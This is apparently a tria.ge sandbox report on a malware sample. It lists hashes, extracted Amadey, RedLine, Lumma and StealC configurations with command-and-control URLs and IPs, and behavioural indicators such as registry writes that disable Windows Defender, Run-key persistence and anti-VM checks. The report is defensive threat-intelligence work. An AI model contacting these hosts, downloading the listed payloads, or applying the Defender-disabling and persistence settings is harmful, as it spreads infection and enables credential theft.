Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
112s -
max time network
151s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
09/03/2025, 02:37
Static task
static1
Behavioral task
behavioral1
Sample
dc25d718f31abfb22d767a38383cc4534ecec474e88e9b84b9e437fb97fd5017.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
dc25d718f31abfb22d767a38383cc4534ecec474e88e9b84b9e437fb97fd5017.exe
Resource
win10v2004-20250217-en
General
-
Target
dc25d718f31abfb22d767a38383cc4534ecec474e88e9b84b9e437fb97fd5017.exe
-
Size
938KB
-
MD5
177de0a157b6aa0663ffae3821f3b026
-
SHA1
82b14ddc83e589e0efad23054271d7c9307e5adc
-
SHA256
dc25d718f31abfb22d767a38383cc4534ecec474e88e9b84b9e437fb97fd5017
-
SHA512
02507fb2431dfc88bbab9d1cf4b227aca16da3629667a1ae6268de06aa1a1dfb037aa8e9b8d7177f7976e2c7c7bb683406591664b1bd9e37cdec7df993ff6ac5
-
SSDEEP
24576:pqDEvCTbMWu7rQYlBQcBiT6rprG8a0cu:pTvC/MTQYxsWR7a0c
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
redline
Build 7
101.99.92.190:40919
Extracted
lumma
https://defaulemot.run/api
https://begindecafer.world/api
https://.garagedrootz.top/api
https://modelshiverd.icu/api
https://arisechairedd.shop/api
https://catterjur.run/api
https://orangemyther.live/api
https://fostinjec.today/api
https://sterpickced.digital/api
https://j8arisechairedd.shop/api
https://garagedrootz.top/api
https://gmodelshiverd.icu/api
Extracted
stealc
trump
http://45.93.20.28
-
url_path
/85a1cacf11314eb8.php
Signatures
-
Amadey family
-
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral1/memory/3372-1713-0x0000000000E80000-0x00000000012F2000-memory.dmp healer behavioral1/memory/3372-1712-0x0000000000E80000-0x00000000012F2000-memory.dmp healer behavioral1/memory/3372-1733-0x0000000000E80000-0x00000000012F2000-memory.dmp healer -
Healer family
-
Lumma family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" 30c6dab708.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection 30c6dab708.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 30c6dab708.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" 30c6dab708.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 30c6dab708.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 30c6dab708.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 30c6dab708.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 30c6dab708.exe -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications 30c6dab708.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" 30c6dab708.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 7 IoCs
resource yara_rule behavioral1/memory/2648-55-0x0000000000400000-0x000000000041E000-memory.dmp family_redline behavioral1/memory/2648-60-0x0000000000400000-0x000000000041E000-memory.dmp family_redline behavioral1/memory/2648-57-0x0000000000400000-0x000000000041E000-memory.dmp family_redline behavioral1/memory/2648-62-0x0000000000400000-0x000000000041E000-memory.dmp family_redline behavioral1/memory/2648-63-0x0000000000400000-0x000000000041E000-memory.dmp family_redline behavioral1/memory/3864-2661-0x0000000000400000-0x000000000041E000-memory.dmp family_redline behavioral1/memory/3864-2659-0x0000000000400000-0x000000000041E000-memory.dmp family_redline -
Redline family
-
SectopRAT payload 7 IoCs
resource yara_rule behavioral1/memory/2648-55-0x0000000000400000-0x000000000041E000-memory.dmp family_sectoprat behavioral1/memory/2648-60-0x0000000000400000-0x000000000041E000-memory.dmp family_sectoprat behavioral1/memory/2648-57-0x0000000000400000-0x000000000041E000-memory.dmp family_sectoprat behavioral1/memory/2648-62-0x0000000000400000-0x000000000041E000-memory.dmp family_sectoprat behavioral1/memory/2648-63-0x0000000000400000-0x000000000041E000-memory.dmp family_sectoprat behavioral1/memory/3864-2661-0x0000000000400000-0x000000000041E000-memory.dmp family_sectoprat behavioral1/memory/3864-2659-0x0000000000400000-0x000000000041E000-memory.dmp family_sectoprat -
Sectoprat family
-
Stealc family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
description pid Process procid_target PID 3016 created 1208 3016 Occupation.com 21 PID 3016 created 1208 3016 Occupation.com 21 -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 7 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempPHIPCPMRGKMJUQGTHBUBC89AKNPGNCYQ.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempXV1OBJEDSIJF28CVP2PRMRQXF8C2XOYB.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ e267fb67b5.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ a221fd437d.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 30c6dab708.exe -
Blocklisted process makes network request 11 IoCs
flow pid Process 4 1856 powershell.exe 14 280 powershell.exe 30 280 powershell.exe 31 280 powershell.exe 36 280 powershell.exe 44 1988 powershell.exe 53 280 powershell.exe 184 4020 powershell.exe 185 4020 powershell.exe 186 4020 powershell.exe 187 4020 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs
Run Powershell and hide display window.
pid Process 2068 powershell.exe 280 powershell.exe 1988 powershell.exe 280 powershell.exe 3868 powershell.exe 4020 powershell.exe 1856 powershell.exe 2576 powershell.exe 2664 powershell.exe 3060 powershell.exe -
Downloads MZ/PE file 13 IoCs
flow pid Process 147 2800 rapes.exe 7 2800 rapes.exe 7 2800 rapes.exe 7 2800 rapes.exe 7 2800 rapes.exe 49 2800 rapes.exe 49 2800 rapes.exe 49 2800 rapes.exe 4 1856 powershell.exe 15 2800 rapes.exe 24 2404 XxzH301.exe 44 1988 powershell.exe 53 280 powershell.exe -
Checks BIOS information in registry 2 TTPs 14 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion e267fb67b5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion a221fd437d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 30c6dab708.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempPHIPCPMRGKMJUQGTHBUBC89AKNPGNCYQ.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempXV1OBJEDSIJF28CVP2PRMRQXF8C2XOYB.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempXV1OBJEDSIJF28CVP2PRMRQXF8C2XOYB.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion e267fb67b5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion a221fd437d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 30c6dab708.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempPHIPCPMRGKMJUQGTHBUBC89AKNPGNCYQ.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EduGeniusX.url cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EduGeniusX.url cmd.exe -
Executes dropped EXE 21 IoCs
pid Process 2716 TempPHIPCPMRGKMJUQGTHBUBC89AKNPGNCYQ.EXE 2800 rapes.exe 2840 PfOHmro.exe 2648 PfOHmro.exe 1316 ReK7Ewx.exe 3016 Occupation.com 2404 XxzH301.exe 2936 m4mrV1B.exe 2296 OSKDbmy.exe 1208 Explorer.EXE 1748 3b9ee8ffbb.exe 780 TempXV1OBJEDSIJF28CVP2PRMRQXF8C2XOYB.EXE 2948 mic800F.tmp.exe 2588 e267fb67b5.exe 2676 a221fd437d.exe 1360 156f54f6b5.exe 3372 30c6dab708.exe 3796 HHPgDSI.exe 3356 HHPgDSI.exe 872 m4mrV1B.exe 1800 ReK7Ewx.exe -
Identifies Wine through registry keys 2 TTPs 7 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine e267fb67b5.exe Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine a221fd437d.exe Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine 30c6dab708.exe Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine TempPHIPCPMRGKMJUQGTHBUBC89AKNPGNCYQ.EXE Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine TempXV1OBJEDSIJF28CVP2PRMRQXF8C2XOYB.EXE Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe -
Loads dropped DLL 36 IoCs
pid Process 1856 powershell.exe 1856 powershell.exe 2716 TempPHIPCPMRGKMJUQGTHBUBC89AKNPGNCYQ.EXE 2716 TempPHIPCPMRGKMJUQGTHBUBC89AKNPGNCYQ.EXE 2800 rapes.exe 2840 PfOHmro.exe 3044 WerFault.exe 3044 WerFault.exe 3044 WerFault.exe 3044 WerFault.exe 3044 WerFault.exe 2800 rapes.exe 1736 cmd.exe 2800 rapes.exe 2800 rapes.exe 2800 rapes.exe 3016 Occupation.com 2800 rapes.exe 1988 powershell.exe 1988 powershell.exe 2800 rapes.exe 2800 rapes.exe 2772 WerFault.exe 2772 WerFault.exe 2772 WerFault.exe 2800 rapes.exe 2800 rapes.exe 2800 rapes.exe 2800 rapes.exe 2800 rapes.exe 2800 rapes.exe 2800 rapes.exe 2800 rapes.exe 2800 rapes.exe 2800 rapes.exe 2800 rapes.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features 30c6dab708.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 30c6dab708.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 8 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10147610121\\am_no.cmd" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\e267fb67b5.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10148390101\\e267fb67b5.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\a221fd437d.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10148400101\\a221fd437d.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\156f54f6b5.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10148410101\\156f54f6b5.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\30c6dab708.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10148420101\\30c6dab708.exe" rapes.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" m4mrV1B.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" m4mrV1B.exe Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\3b9ee8ffbb.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10147600101\\3b9ee8ffbb.exe" rapes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 7 IoCs
flow ioc 184 bitbucket.org 185 bitbucket.org 17 bitbucket.org 18 bitbucket.org 31 bitbucket.org 36 bitbucket.org 183 bitbucket.org -
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x000b00000001a4f9-1011.dat autoit_exe behavioral1/files/0x0004000000005b57-1551.dat autoit_exe -
Enumerates processes with tasklist 1 TTPs 6 IoCs
pid Process 1772 tasklist.exe 1984 tasklist.exe 3336 tasklist.exe 1944 tasklist.exe 4072 tasklist.exe 2688 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
pid Process 2716 TempPHIPCPMRGKMJUQGTHBUBC89AKNPGNCYQ.EXE 2800 rapes.exe 780 TempXV1OBJEDSIJF28CVP2PRMRQXF8C2XOYB.EXE 2320 483d2fa8a0d53818306efeb32d3.exe 2588 e267fb67b5.exe 2676 a221fd437d.exe 3372 30c6dab708.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2840 set thread context of 2648 2840 PfOHmro.exe 41 -
Drops file in Windows directory 8 IoCs
description ioc Process File opened for modification C:\Windows\CombatTongue ReK7Ewx.exe File opened for modification C:\Windows\PracticeRoot ReK7Ewx.exe File opened for modification C:\Windows\PlatesRegister ReK7Ewx.exe File created C:\Windows\Tasks\rapes.job TempPHIPCPMRGKMJUQGTHBUBC89AKNPGNCYQ.EXE File opened for modification C:\Windows\CombatTongue ReK7Ewx.exe File opened for modification C:\Windows\PracticeRoot ReK7Ewx.exe File opened for modification C:\Windows\PlatesRegister ReK7Ewx.exe File created C:\Windows\main.exe PfOHmro.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 5 IoCs
pid pid_target Process procid_target 3044 2840 WerFault.exe 40 2772 2588 WerFault.exe 101 3764 3460 WerFault.exe 150 2524 2880 WerFault.exe 172 3964 3812 WerFault.exe 174 -
System Location Discovery: System Language Discovery 1 TTPs 58 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language expand.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language extrac32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IEXPLORE.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage 156f54f6b5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 30c6dab708.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language 156f54f6b5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e267fb67b5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 156f54f6b5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Occupation.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ReK7Ewx.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3b9ee8ffbb.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mic800F.tmp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language expand.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempPHIPCPMRGKMJUQGTHBUBC89AKNPGNCYQ.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ReK7Ewx.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language a221fd437d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dc25d718f31abfb22d767a38383cc4534ecec474e88e9b84b9e437fb97fd5017.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PfOHmro.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PfOHmro.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
System Time Discovery 1 TTPs 1 IoCs
Adversary may gather the system time and/or time zone settings from a local or remote system.
pid Process 1960 iexplore.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 2416 timeout.exe -
Kills process with taskkill 5 IoCs
pid Process 2496 taskkill.exe 2208 taskkill.exe 2648 taskkill.exe 2440 taskkill.exe 2456 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = b09c926b9c90db01 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "447649773" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{92E2E181-FC8F-11EF-928D-EE9D5ADBD8E3} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\SearchScopes iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 